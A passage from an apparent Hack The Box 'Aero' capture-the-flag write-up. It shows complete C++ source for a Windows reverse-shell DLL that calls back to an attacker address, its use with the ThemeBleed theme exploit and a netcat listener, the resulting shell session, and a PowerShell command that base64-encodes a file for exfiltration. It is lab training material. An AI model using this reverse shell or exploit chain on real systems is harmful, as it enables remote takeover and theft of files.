url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7DAAAOwwHHb6hkAAABW0lEQVR42n2Ta5KCMBCEuYeIyFsCCRAIsrV4/1vNTk8ZSl3hR1eKPHq+ToagrCqa3Z2cc9R1HRmjeTTU9z1ZO9A0TRTHMUVRJLpcLocKyrIkO4zkJkfDMLB66oyhcbRiaMeRsiyjJEkoTVO6Xq/HhhUTTtNIummZztDEBjAGaZ7nhIKzm4XeWktN01AYhhvxJ3Vwu93oPt9Jay0EoPHCNwQ6IXwqedEncaC44mN9UMujUupNoGnbdleAAND5fH4hrGtalkUMDW/QT+EANiN2URS78uugRfygrhWt6yr6+V0l/jzPfG9OXtqT7glFMeKKxDBndxyqeCHOCgpPJ4ngLxwtg3vaE9b9fokM3IbjKY6OSojrqyM2usA/VpqlHDGTmF5Ye3sUGOJgo5qnYbsZap6vuRBIfB++NvnXtkEVHMZBmKLvthcWU729qtFGqI7+mODfZPT+fUTzzfAP5I5b7rPih4cAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visual studio configure project" title="" src="/static/eedde12bf5ca9fd43eea4206baf2bb21/50637/visual-studio-configure-project.png" srcset="/static/eedde12bf5ca9fd43eea4206baf2bb21/dda05/visual-studio-configure-project.png 158w, /static/eedde12bf5ca9fd43eea4206baf2bb21/679a3/visual-studio-configure-project.png 315w, /static/eedde12bf5ca9fd43eea4206baf2bb21/50637/visual-studio-configure-project.png 630w, /static/eedde12bf5ca9fd43eea4206baf2bb21/66d45/visual-studio-configure-project.png 683w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Within the project, I needed to add an export called <code class="language-text">VerifyThemeVersion</code> to contain the custom payload. So first I added a new header file by going to the Solution Explorer and right clicking <code class="language-text">Header Files</code> then <code class="language-text">Add</code> → <code class="language-text">New Item...</code> and named it <code class="language-text">rev.h</code>.</p> <p>In <code class="language-text">rev.h</code>, I declared the exported function <code class="language-text">VerifyThemeVersion</code>:</p> <div class="gatsby-highlight" data-language="cpp"><pre class="language-cpp"><code class="language-cpp"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">pragma</span> <span class="token expression">once</span></span> <span class="token keyword">extern</span> <span class="token string">"C"</span> <span class="token function">__declspec</span><span class="token punctuation">(</span>dllexport<span class="token punctuation">)</span> <span class="token keyword">int</span> <span class="token function">VerifyThemeVersion</span><span class="token punctuation">(</span><span class="token keyword">void</span><span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre></div> <p>Also in the <code class="language-text">Header Files</code> directory, I added <code class="language-text">rev.h</code> to <code class="language-text">pch.h</code> as a precompiled header:</p> <div class="gatsby-highlight" data-language="cpp"><pre class="language-cpp"><code class="language-cpp"><span class="token comment">// pch.h: This is a precompiled header file.</span> <span class="token comment">// Files listed below are compiled only once, improving build performance for future builds.</span> <span class="token comment">// This also affects IntelliSense performance, including code completion and many code browsing features.</span> <span class="token comment">// However, files listed here are ALL re-compiled if any one of them is updated between builds.</span> <span class="token comment">// Do not add files here that you will be updating frequently as this negates the performance advantage.</span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">ifndef</span> <span class="token expression">PCH_H</span></span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">define</span> <span class="token macro-name">PCH_H</span></span> <span class="token comment">// add headers that you want to pre-compile here</span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">"framework.h"</span></span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">"rev.h"</span></span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">endif</span> <span class="token comment">//PCH_H</span></span></code></pre></div> <p>Then, in the <code class="language-text">Source Files</code> directory, I added <code class="language-text">rev.cpp</code>, which contains the reverse shell payload based on <a href="https://github.com/tudorthe1ntruder/reverse-shell-poc/blob/master/rs.c" target="_blank">this</a> template with a few adjustments. The main change is that the reverse shell code has been encapsulated in a function named <code class="language-text">rev_shell()</code>, which is then invoked by the <code class="language-text">VerifyThemeVersion()</code> function:</p> <div class="gatsby-highlight" data-language="cpp"><pre class="language-cpp"><code class="language-cpp"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">"pch.h"</span></span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;string.h></span></span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;process.h></span></span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;winsock2.h></span></span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;ws2tcpip.h></span></span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span> <span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">pragma</span> <span class="token expression"><span class="token function">comment</span><span class="token punctuation">(</span>lib<span class="token punctuation">,</span> </span><span class="token string">"Ws2_32.lib"</span><span class="token expression"><span class="token punctuation">)</span></span></span> <span class="token keyword">using</span> <span class="token keyword">namespace</span> std<span class="token punctuation">;</span> <span class="token keyword">void</span> <span class="token function">rev_shell</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token function">FreeConsole</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token keyword">const</span> <span class="token keyword">char</span><span class="token operator">*</span> REMOTE_ADDR <span class="token operator">=</span> <span class="token string">"10.10.14.64"</span><span class="token punctuation">;</span> <span class="token keyword">const</span> <span class="token keyword">char</span><span class="token operator">*</span> REMOTE_PORT <span class="token operator">=</span> <span class="token string">"9001"</span><span class="token punctuation">;</span> WSADATA wsaData<span class="token punctuation">;</span> <span class="token keyword">int</span> iResult <span class="token operator">=</span> <span class="token function">WSAStartup</span><span class="token punctuation">(</span><span class="token function">MAKEWORD</span><span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>wsaData<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token keyword">struct</span> <span class="token class-name">addrinfo</span><span class="token operator">*</span> result <span class="token operator">=</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token operator">*</span> ptr <span class="token operator">=</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> hints<span class="token punctuation">;</span> <span class="token function">memset</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>hints<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span>hints<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> hints<span class="token punctuation">.</span>ai_family <span class="token operator">=</span> AF_UNSPEC<span class="token punctuation">;</span> hints<span class="token punctuation">.</span>ai_socktype <span class="token operator">=</span> SOCK_STREAM<span class="token punctuation">;</span> hints<span class="token punctuation">.</span>ai_protocol <span class="token operator">=</span> IPPROTO_TCP<span class="token punctuation">;</span> <span class="token function">getaddrinfo</span><span class="token punctuation">(</span>REMOTE_ADDR<span class="token punctuation">,</span> REMOTE_PORT<span class="token punctuation">,</span> <span class="token operator">&amp;</span>hints<span class="token punctuation">,</span> <span class="token operator">&amp;</span>result<span class="token punctuation">)</span><span class="token punctuation">;</span> ptr <span class="token operator">=</span> result<span class="token punctuation">;</span> SOCKET ConnectSocket <span class="token operator">=</span> <span class="token function">WSASocket</span><span class="token punctuation">(</span>ptr<span class="token operator">-></span>ai_family<span class="token punctuation">,</span> ptr<span class="token operator">-></span>ai_socktype<span class="token punctuation">,</span> ptr<span class="token operator">-></span>ai_protocol<span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token function">connect</span><span class="token punctuation">(</span>ConnectSocket<span class="token punctuation">,</span> ptr<span class="token operator">-></span>ai_addr<span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">int</span><span class="token punctuation">)</span>ptr<span class="token operator">-></span>ai_addrlen<span class="token punctuation">)</span><span class="token punctuation">;</span> STARTUPINFO si<span class="token punctuation">;</span> PROCESS_INFORMATION pi<span class="token punctuation">;</span> <span class="token function">ZeroMemory</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>si<span class="token punctuation">,</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span>si<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> si<span class="token punctuation">.</span>cb <span class="token operator">=</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span>si<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token function">ZeroMemory</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>pi<span class="token punctuation">,</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span>pi<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> si<span class="token punctuation">.</span>dwFlags <span class="token operator">=</span> STARTF_USESTDHANDLES <span class="token operator">|</span> STARTF_USESHOWWINDOW<span class="token punctuation">;</span> si<span class="token punctuation">.</span>wShowWindow <span class="token operator">=</span> SW_HIDE<span class="token punctuation">;</span> si<span class="token punctuation">.</span>hStdInput <span class="token operator">=</span> <span class="token punctuation">(</span>HANDLE<span class="token punctuation">)</span>ConnectSocket<span class="token punctuation">;</span> si<span class="token punctuation">.</span>hStdOutput <span class="token operator">=</span> <span class="token punctuation">(</span>HANDLE<span class="token punctuation">)</span>ConnectSocket<span class="token punctuation">;</span> si<span class="token punctuation">.</span>hStdError <span class="token operator">=</span> <span class="token punctuation">(</span>HANDLE<span class="token punctuation">)</span>ConnectSocket<span class="token punctuation">;</span> TCHAR cmd<span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token function">TEXT</span><span class="token punctuation">(</span><span class="token string">"C:\\WINDOWS\\SYSTEM32\\CMD.EXE"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token function">CreateProcess</span><span class="token punctuation">(</span><span class="token constant">NULL</span><span class="token punctuation">,</span> cmd<span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> TRUE<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>si<span class="token punctuation">,</span> <span class="token operator">&amp;</span>pi<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token function">WaitForSingleObject</span><span class="token punctuation">(</span>pi<span class="token punctuation">.</span>hProcess<span class="token punctuation">,</span> INFINITE<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token function">CloseHandle</span><span class="token punctuation">(</span>pi<span class="token punctuation">.</span>hProcess<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token function">CloseHandle</span><span class="token punctuation">(</span>pi<span class="token punctuation">.</span>hThread<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token function">WSACleanup</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token keyword">int</span> <span class="token function">VerifyThemeVersion</span><span class="token punctuation">(</span><span class="token keyword">void</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token function">rev_shell</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span> <span class="token punctuation">}</span></code></pre></div> <p>I set the build configuration to <code class="language-text">Release</code> and <code class="language-text">x64</code> before building the solution:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6c7b04097065888f66c4dd9188506d8c/70582/visual-studio-build-configuration-release-x64.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 10.126582278481013%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeklEQVR42h2M2wrCQAxE+ylNdd1skr2B1SIIXuiT//89Y7oPhwyHyUzffUfOBcwMM0UURXJEBNndo5TB1fPqblNFlQTx23sfvVrr+D+YKDBoOYPjBbUoQlkRkrkjNCL8tjvereHTG55mePnQzSLYR9Xzgbk/hQXzTPgDGVw8nebTQTgAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="set visual studio build configuration to Release and x64" title="" src="/static/6c7b04097065888f66c4dd9188506d8c/50637/visual-studio-build-configuration-release-x64.png" srcset="/static/6c7b04097065888f66c4dd9188506d8c/dda05/visual-studio-build-configuration-release-x64.png 158w, /static/6c7b04097065888f66c4dd9188506d8c/679a3/visual-studio-build-configuration-release-x64.png 315w, /static/6c7b04097065888f66c4dd9188506d8c/50637/visual-studio-build-configuration-release-x64.png 630w, /static/6c7b04097065888f66c4dd9188506d8c/70582/visual-studio-build-configuration-release-x64.png 689w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">Build started at 11:56 AM... 1>------ Build started: Project: RevDLL, Configuration: Release x64 ------ 1>rev.cpp 1>Generating code 1>Previous IPDB not found, fall back to full compilation. 1>All 1 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 1>Finished generating code 1>RevDLL.vcxproj -> C:\Users\mike\Desktop\HTB\Aero\rev_dll\RevDLL\x64\Release\RevDLL.dll ========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ========== ========== Build completed at 11:56 AM and took 03.634 seconds ==========</code></pre></div> <p>Once the build completed, I replaced <code class="language-text">stage_3</code> in the <code class="language-text">data</code> directory of the PoC with the newly created DLL:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\mike\Desktop\HTB\Aero\ThemeBleed > copy C:\Users\mike\Desktop\HTB\Aero\rev_dll\RevDLL\x64\Release\RevDLL.dll .\data\stage_3</code></pre></div> <p>I generated the theme with <code class="language-text">make_theme</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\mike\Desktop\HTB\Aero\ThemeBleed > .\ThemeBleed.exe make_theme 10.10.14.64 exploit.theme PS C:\Users\mike\Desktop\HTB\Aero\ThemeBleed > ls Directory: C:\Users\mike\Desktop\HTB\Aero\ThemeBleed Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 8/7/2024 12:03 PM data -a---- 8/7/2024 12:12 PM 389 exploit.theme -a---- 7/29/2023 2:09 PM 410112 SMBLibrary.dll -a---- 5/19/2023 11:52 PM 26624 SMBLibrary.Win32.dll -a---- 9/12/2023 9:35 PM 19968 ThemeBleed.exe -a---- 9/12/2023 9:35 PM 48640 ThemeBleed.pdb</code></pre></div> <p>Attempting to start the server failed:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\mike\Desktop\HTB\Aero\ThemeBleed > .\ThemeBleed.exe server Unhandled Exception: System.Net.Sockets.SocketException: An attempt was made to access a socket in a way forbidden by its access permissions at System.Net.Sockets.Socket.DoBind(EndPoint endPointSnapshot, SocketAddress socketAddress) at System.Net.Sockets.Socket.Bind(EndPoint localEP) at SMBLibrary.Server.SMBServer.Start(IPAddress serverAddress, SMBTransportType transport, Int32 port, Boolean enableSMB1, Boolean enableSMB2, Boolean enableSMB3, Nullable`1 connectionInactivityTimeout) at SMBLibrary.Server.SMBServer.Start(IPAddress serverAddress, SMBTransportType transport, Boolean enableSMB1, Boolean enableSMB2) at SMBFilterDemo.Program.RunServer() in C:\Users\U\source\repos\SMBFilterDemo\SMBFilterDemo\Program.cs:line 63 at SMBFilterDemo.Program.Main(String[] args) in C:\Users\U\source\repos\SMBFilterDemo\SMBFilterDemo\Program.cs:line 129</code></pre></div> <p>This was because port <code class="language-text">445</code> was already in use, as Windows listens on this port by default for SMB. So to free up the port, I stopped the <code class="language-text">Server</code> Windows service and set the startup type to disabled within Properties:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/12cda360dc74f0bd548ea36987d9e4f0/af233/server-windows-service.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 71.51898734177216%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACQElEQVR42oVT2YrbQBD0//9MPiAQ8hQICWwglm1Zsm5pdFi3rMOSVakZx7sEvNmBZnqu6urqnk12LnAuG7Rtg+7SY1lumOcrbusN97HibaxP9h7ru22Oxgl73cCP3zt8+vKCz9+2+PpTx3fNxc4S0N0MBzfFwUmwNUNo3NvbsfK3ZqRszzN5R6dt1vUeTcQpQpGh7kZU7YCy7blOkeclpuuMtrsgjASSJONejiSOUZQVZIZN26ns5LzBX8A0iXHQdgj9AL7rqouWG8I8HuE6LtI0VSABzw3bx9Hy1N4w9Bj6Hj2tLIo3hlEYYr/bQz/oCtj1AjiBgGNZClCQnWTW1DW0qMMhGbDebni8l3PNs81DVnlxHEbMTG9ZFkzzAtPxYZ9OsC2bASNUZUkmA7IshRARYjL2gxCe7yPnWdM0b4DDMLxGk2O5rbC9kOwceK6nGKYiVnIEno+YARIhUDHNTpJhynVdvQ84E1AyNPUjrJOlGLa2gzEIUBgGcmrb2DZaBmwZpKVfJckHDP2IGtosUIaCTKRGbXPv2XEcscwzrteJdlX2j4bPGKpqskgR0+15HrJwNpn4ZOl5HgKupS/3oyj6GNANYurnMl2hGOb5naVkN/L+RFM+bSbb/xblVUPDVAWRgNM0qQ6YmV7TT8j5ASTzy+WiwM7n8zuAfDg3LWw2dsCWkKy6rlPpClb2TE1/aTpetCO2mqaCWuxX2ejPATlfxwmabimtpD5JnGDHhk/4RWVh9vSrsoDBassf8mjuP3+ZJjXO/pd5AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="server windows service" title="" src="/static/12cda360dc74f0bd548ea36987d9e4f0/50637/server-windows-service.png" srcset="/static/12cda360dc74f0bd548ea36987d9e4f0/dda05/server-windows-service.png 158w, /static/12cda360dc74f0bd548ea36987d9e4f0/679a3/server-windows-service.png 315w, /static/12cda360dc74f0bd548ea36987d9e4f0/50637/server-windows-service.png 630w, /static/12cda360dc74f0bd548ea36987d9e4f0/fddb0/server-windows-service.png 945w, /static/12cda360dc74f0bd548ea36987d9e4f0/af233/server-windows-service.png 946w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After rebooting the VM, I was able to start the server:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\mike\Desktop\HTB\Aero\ThemeBleed > .\ThemeBleed.exe server Server started</code></pre></div> <p>I also started a netcat listener:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\mike\Desktop\HTB\Aero > c:\tools\netcat\nc.exe -lvnp 9001 listening on [any] 9001 ...</code></pre></div> <p>Then, I uploaded <code class="language-text">exploit.theme</code> to the Aero webpage and received the following requests on the ThemeBleed server:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\mike\Desktop\HTB\Aero\ThemeBleed > .\ThemeBleed.exe server Server started Client requested stage 1 - Version check Client requested stage 1 - Version check Client requested stage 1 - Version check Client requested stage 1 - Version check Client requested stage 1 - Version check Client requested stage 1 - Version check Client requested stage 1 - Version check Client requested stage 2 - Verify signature Client requested stage 2 - Verify signature Client requested stage 2 - Verify signature Client requested stage 2 - Verify signature Client requested stage 2 - Verify signature Client requested stage 2 - Verify signature Client requested stage 3 - LoadLibrary</code></pre></div> <p>Soon after uploading the theme, netcat caught a shell as <code class="language-text">sam.emerson</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\mike\Desktop\HTB\Aero > c:\tools\netcat\nc.exe -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.64] from (UNKNOWN) [10.10.11.237] 49685 Microsoft Windows [Version 10.0.22000.1761] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami aero\sam.emerson C:\Windows\system32>cd \users\sam.emerson\desktop cd \users\sam.emerson\desktop C:\Users\sam.emerson\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is C009-0DB2 Directory of C:\Users\sam.emerson\Desktop 09/20/2023 05:20 AM &lt;DIR> . 09/20/2023 05:08 AM &lt;DIR> .. 08/07/2024 01:30 PM 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 3,069,128,704 bytes free</code></pre></div> <p><code class="language-text">C:\Users\sam.emerson\documents</code> contained <code class="language-text">CVE-2023-28252_Summary.pdf</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\sam.emerson\documents> ls ls Directory: C:\Users\sam.emerson\documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/21/2023 9:18 AM 14158 CVE-2023-28252_Summary.pdf -a---- 9/26/2023 1:06 PM 1113 watchdog.ps1</code></pre></div> <p>To exfiltrate the PDF, the document first needed to be converted to base64:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\sam.emerson\documents> [convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte)) [convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte)) 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